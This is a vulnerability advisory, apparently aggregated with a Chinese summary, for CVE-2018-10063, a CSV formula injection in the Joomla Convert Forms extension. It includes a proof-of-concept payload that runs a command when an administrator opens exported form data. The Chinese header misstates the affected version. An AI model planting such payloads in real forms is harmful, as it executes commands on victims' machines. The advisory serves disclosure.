Joomla! Convert Forms扩展安全漏洞

https://www.exploit-db.com/exploits/44447
https://cxsecurity.com/issue/WLB-2018040100
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201804-600

Joomla!是美国Open Source Matters开发团队开发的一套开源的内容管理系统(CMS)，它提供RSS馈送、网站搜索等功能。Extension Convert Forms是使用在其中的一个表单生成插件。 Joomla Extension Convert Forms 2.0.4版本中存在命令注入漏洞。远程攻击者可借助特制的文件利用该漏洞执行命令。

# Exploit Title: Joomla Extension Convert Forms version 2.0.3 is vulnerable to Formula Injection (CSV Injection)
# Google Dork: N/A
# Date: 12-04-2018
################################
# Exploit Author: Jetty Sairam
################################
# Software Link: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/forms/convert-forms/
# Affected Version: 2.03 and before
#Category: Plugins and Extensions
# Tested on: WiN7_x64
# CVE : CVE-2018-10063

1. Application Description:
Convert Forms provides a framework to build custom forms for Joomla users.
2. Technical Description:
Custom Forms version 2.0.3 is affected by the vulnerability Remote Command Execution using CSV Injection. This allows a public user to inject commands as a part of form fields and when a user with higher privilege exports the form data in CSV opens the file on their machine, the command is executed.
3. Proof Of Concept:
Enter the payload @SUM(1+1)*cmd|' /C calc'!A0 in the form fields and submit.
When high privileged user logs into the application to export form data in CSV and opens the file.
Formula gets executed and calculator will get popped in his machine.
4. Solution:
Upgrade to version 2.0.4
https://extensions.joomla.org/extensions/extension/contacts-and-feedback/forms/convert-forms/
5. Reference:
https://vel.joomla.org/resolved/2160-convert-forms-2-0-3-csv-injection
https://www.tassos.gr/blog/convert-forms-2-0-4-security-release
https://vel.joomla.org/articles/2140-introducing-csv-injection

来源:www.tassos.gr
链接:https://www.tassos.gr/blog/convert-forms-2-0-4-security-release